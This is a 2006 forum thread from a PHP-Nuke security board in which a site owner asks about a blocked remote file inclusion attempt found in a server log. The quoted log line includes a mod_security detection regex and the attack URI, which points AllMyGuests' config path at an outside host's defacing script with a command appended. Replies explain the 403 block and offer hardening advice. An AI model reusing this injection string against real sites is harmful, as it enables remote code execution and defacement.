Ravens PHP Scripts: Forums

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Gremmie
Former Moderator in Good Standing

PostPosted: Sat Jun 10, 2006 5:11 pm Reply with quote

Code:

[Sat Jun 10 16:41:05 2006] [error] [client x.x.x.x] mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.myhost.com"] [uri "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.panzergrenadiers.com/ss/tool25.dat?&list=1&cmd=id"]

I changed my host name to myhost and x'd out the IP address, but otherwise this is exactly what I happened to notice in my log today. What does this mean? It looks like my hosts server blocked it, not my Nuke or Sentinel. Correct?

If you look at the link
[ Only registered users can see links on this board! Get registered or login! ]

It appears to be some kind of defacing script.

What's going on here and who should I contact? Thanks.

hitwalker
Sells PC To Pay For Divorce

PostPosted: Sat Jun 10, 2006 5:43 pm Reply with quote

Welcome to the club,yes these are simple tools they use on hundreds of websites everyday.
The attacks are usualy targeted towards forums,allmyguests,coppermine,gallery2 etc...and the list continues.
Most of the times it doesnt work but they are doing this by remote and hope someday they have a victim...
and theres nothing much you can do,but make sure you are secured and dont use any mods thats aren't secure..

Susann

PostPosted: Sat Jun 10, 2006 5:51 pm Reply with quote

That´s club member number 100.001 Smile Nice club.

403 in your log files means forbidden so there is nothing to do. Do a search here in the forum for AllMyGuests signin.php or cmd.

fkelly
Former Moderator in Good Standing

PostPosted: Sat Jun 10, 2006 9:23 pm Reply with quote

This site and defacing tool was in my log tonight when I checked it too. It was from a Turkish IP address and I had taken advantage of Nuke Sentinel and the import tool and IP2country tables to ban the whole country. You might want to look at that option unless you need Turkish users. There are a few countries where a lot of hacks come from. In the hack script that I looked at he includes another hack script from Brazil.

Just try to keep current with Sentinel and keep checking your logs and make sure no one has a back door into your site via the administrative interface provided by your host.

kguske
Site Admin

PostPosted: Sun Jun 11, 2006 10:14 am Reply with quote

While it's true that most of the script kiddies who use tools like this probably couldn't figure out how to spoof their IP address, it isn't that hard to do...

Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic